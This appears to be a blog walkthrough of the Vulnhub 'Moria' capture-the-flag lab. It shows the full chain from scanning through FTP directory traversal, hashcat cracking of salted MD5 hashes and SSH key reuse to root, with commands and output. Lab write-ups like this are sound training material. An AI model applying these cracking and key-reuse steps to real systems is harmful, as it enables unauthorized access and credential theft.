Vulnhub Moria Walkthrough


I spent some time with Moria (v1.1) this past week…super fun machine and a good exercise in thinking outside the box.

And without further ado…here’s Moria.

Nmap shows…

root@kali:~/vulnhub/moria# cat moria.nmap 
# Nmap 7.60 scan initiated Mon Nov  6 18:34:11 2017 as: nmap -sS -sV -oA moria 172.16.115.135
Nmap scan report for 172.16.115.135
Host is up (0.00031s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:D5:6D:D5 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov  6 18:34:25 2017 -- 1 IP address (1 host up) scanned in 14.47 seconds

Checking out port 80 we see….

Uh…sure. Admittedly, I’m not good at being a geek. I know this is LOTR related, but meh…I take note, and run gobuster.

root@kali:~/vulnhub/moria# gobuster -u http://172.16.115.135 -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,30207,403,500' -e 

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://172.16.115.135/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 403,500,200,204,301,302,307
[+] Expanded     : true
=====================================================
http://172.16.115.135/.hta (Status: 403)
http://172.16.115.135/.htpasswd (Status: 403)
http://172.16.115.135/.htaccess (Status: 403)
http://172.16.115.135/cgi-bin/ (Status: 403)
http://172.16.115.135/index.php (Status: 200)
http://172.16.115.135/w (Status: 301)
=====================================================

Nothing too interesting…let’s see what’s what in w.

WUT? We keep digging and to save some reading time, we end up with http://moria/w/h/i/s/p/e/r/the_abyss — what’s interesting is that every page refresh present something new.

We see: (with a refresh in between each one)

Balin: "Be quiet, the Balrog will hear you!"
Oin:"Stop knocking!"
Ori:"Will anyone hear us?"
Fundin:"That human will never save us!"
Nain:"Will the human get the message?"
"Eru! Save us!"
"We will die here.."
"Is this the end?"
"Knock knock"
"Too loud!"
Maeglin:"The Balrog is not around, hurry!"
Telchar to Thrain:"That human is slow, don't give up yet"
Dain:"Is that human deaf? Why is it not listening?"

Alrighty then. So…I wasn’t sure what was going on here yet. I went back to the image on the home page. Is there a secret message? I’m not sure…so I saved the image locally, and tried to extract any info out of it using stegosuite.

root@kali:~/vulnhub/moria# stegosuite -x moria.jpg 
Loading jpg image from /root/vulnhub/moria/moria.jpg
Extracting data...
Nf weder 1 noch 3

Interesting. Throwing that into Google, we get the idea that “weder noch” means “neither nor” – so neither 1 nor 3. Honestly, I have no idea if this was any kind of hint or what, but for what it’s worth, I included it here…at least to introduce you to stegosuite perhaps if you haven’t encountered it before.

Ok…so where were we? After reviewing the phrases on “the_abyss,” we see a theme of hearing, listening, knocking. So let’s listen. Fire up wireshark, and we see this (output below is filtered, but the content is what we’re interested in)

This pattern repeats, over and over. Destination ports 77, 101, 108, 108, 111, 110, 54, 57. I tried several times to see if port knocking would have any affect using the specified order, but no such luck. Nmap scans returned no new ports, and nothing seemed to be changing. As Telchar said to Thrain, “That human is slow, don’t give up yet.”

Being a slow human, I wasted some time trying to figure out what this meant. Ultimately, I landed here: https://www.branah.com/ascii-converter, and finally figured out that 77, 101, 108, 108, 111, 110, 54, 57 converted to ascii gives us “Mellon69” … ok then. Looks like a password to me. Where can we use it? How about that ftp server?

After trying a few defaults (admin, root, moria, etc.) I noticed the FTP welcome message: “Welcome Balrog” – so I try that…and success!

root@kali:~/vulnhub/moria# ftp 172.16.115.135
Connected to 172.16.115.135.
220 Welcome Balrog!
Name (172.16.115.135:root): Balrog
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

A little exploration leads to…directory traversal. Excellent…let’s see what we can find.

ftp> pwd
257 "/prison"
ftp> cd /
250 Directory successfully changed.
ftp> pwd
257 "/"
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0               7 Mar 11  2017 bin -> usr/bin
dr-xr-xr-x    4 0        0            4096 Mar 11  2017 boot
drwxr-xr-x   21 0        0            3240 Nov 08 06:07 dev
drwxr-xr-x   97 0        0            8192 Nov 10 00:35 etc
[...SNIP...]
ftp> cd /var/www/html
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.

We’ve found that we can break out of /prison, and explore the file system. In /var/www/html, we find an interesting directory…what can that be?

Looks like some md5 hashes. I took the hashes, threw them into hashcat against rockyou, and nothing…generated some LOTR wordlists…nothing. Hmph. Perhaps I should’ve dug deeper. (use the source, Luke). Viewing the source of the page shows us that this is an md5(md5(password).salt) hash. Oh…and it conveniently gives us the salt value as well. Good deal.

A little Googling shows that the proper hashcat mode is 2611.

root@wopr/Users/gmurphy/hashcat$ cat moria.hashes
c2d8960157fc8540f6d5d66594e165e0:6MAp84
727a279d913fba677c490102b135e51e:bQkChe
8c3c3152a5c64ffb683d78efc3520114:HnqeN4
6ba94d6322f53f30aca4f34960203703:e5ad5s
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP
6a113db1fd25c5501ec3a5936d817c29:cC5nTr
7db5040c351237e8332bfbba757a1019:h8spZR
dd272382909a4f51163c77da6356cc6f:tb9AWe

root@wopr/Users/gmurphy/hashcat$ ./hashcat -m 2611 -a 0 moria.hashes rockyou.txt
hashcat (v3.5.0-149-g23b5e7f) starting...
[...SNIP...]

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14343298
* Bytes.....: 139921513
* Keyspace..: 14343298

dd272382909a4f51163c77da6356cc6f:tb9AWe:magic
727a279d913fba677c490102b135e51e:bQkChe:rainbow
6ba94d6322f53f30aca4f34960203703:e5ad5s:fuckoff
8c3c3152a5c64ffb683d78efc3520114:HnqeN4:spanky
6a113db1fd25c5501ec3a5936d817c29:cC5nTr:abcdef
c2d8960157fc8540f6d5d66594e165e0:6MAp84:flower
7db5040c351237e8332bfbba757a1019:h8spZR:darkness
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP:warrior
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7:hunter2

Session..........: hashcat
Status...........: Cracked
Hash.Type........: vBulletin < v3.8.5
Hash.Target......: moria.hashes
Time.Started.....: Wed Nov  8 00:56:47 2017 (0 secs)
Time.Estimated...: Wed Nov  8 00:56:47 2017 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 48572.0 kH/s (7.24ms)
Recovered........: 9/9 (100.00%) Digests, 9/9 (100.00%) Salts
Progress.........: 5898375/129089682 (4.57%)
Rejected.........: 135/5898375 (0.00%)
Restore.Point....: 0/14343298 (0.00%)
Candidates.#2....: 123456 -> grape06

Started: Wed Nov  8 00:56:38 2017

Great…now we have what seems to be some usernames and passwords. Enumerating through the list lands us an SSH login using Ori. Let’s dig in…

root@kali:~/vulnhub/moria# ssh Ori@172.16.115.135
Ori@172.16.115.135's password: 
Last login: Thu Nov 9 17:56:44 2017 from 172.16.115.137
-bash-4.2$ ls -lah
total 16K
drwx------  3 Ori  notBalrog   55 Nov  9 19:59 .
drwxr-x---. 4 root notBalrog   32 Mar 14  2017 ..
-rw-------  1 Ori  notBalrog 9.2K Nov  9 17:57 .bash_history
drwx------  2 Ori  notBalrog   57 Mar 12  2017 .ssh
-rw-r--r--  1 root root       225 Mar 13  2017 poem.txt
-bash-4.2$ cat poem.txt 
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by. 

PS: Moria will not fall!

Poem.txt doesn’t really show anything interesting, but at least I have a good drinking song for my upcoming guys weekend! But I digress…back to the good stuff.

Let’s check out .ssh and see what we find.

-bash-4.2$ ls -lah 
total 12K
drwx------ 2 Ori notBalrog   57 Mar 12  2017 .
drwx------ 3 Ori notBalrog   55 Nov  9 19:59 ..
-rw------- 1 Ori notBalrog 1.7K Mar 12  2017 id_rsa
-rw-r--r-- 1 Ori notBalrog  392 Mar 12  2017 id_rsa.pub
-rw-r--r-- 1 Ori notBalrog  342 Nov  9 18:12 known_hosts
-bash-4.2$ cat known_hosts 
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
-bash-4.2$

So Ori has ssh’d into 127.0.0.1 before. Interesting indeed. Two things to take note of here, if you’re not familiar with public key authentication:

  • “known_hosts” contains the public key of hosts that you have previously SSH’d into
  • “authorized_keys” specifies the SSH keys that can be used for logging into a user account when public key auth is configured

With that…let’s see if we’re lucky enough that Ori’s key was in root’s “authorized_keys”.

-bash-4.2$ ssh root@127.0.0.1 -i id_rsa
Last login: Thu Nov  9 22:42:22 2017 from 127.0.0.1
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# cat /root/flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy

[root@Moria ~]#

 

Excellent! Root it is. Nicely done challenge, Abatchy.

Thanks for reading…hopefully you have learned something.